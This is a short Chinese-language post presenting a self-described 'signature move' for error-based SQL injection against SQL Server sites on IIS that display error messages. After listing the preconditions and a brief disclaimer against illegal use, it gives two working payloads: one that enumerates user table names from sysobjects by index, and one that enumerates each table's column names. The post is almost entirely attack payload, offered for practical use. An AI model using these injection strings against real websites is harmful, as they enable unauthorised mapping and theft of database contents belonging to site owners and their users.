必殺技成功條件:
1.找到注入點
2.數據庫為sqlserver
3.iis沒屏蔽錯誤提示
注:因必殺技是我研究n久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。
[n] = 第n個表
id=1 and (select top 1 name from(select top [n] id,name from sysobjects where xtype=char(85)) t order by id desc)>1
[t] = 表名
[n] = 第n個字段
id=1 and (select top 1 col_name(object_id([t]),[n]) from sysobjects)>1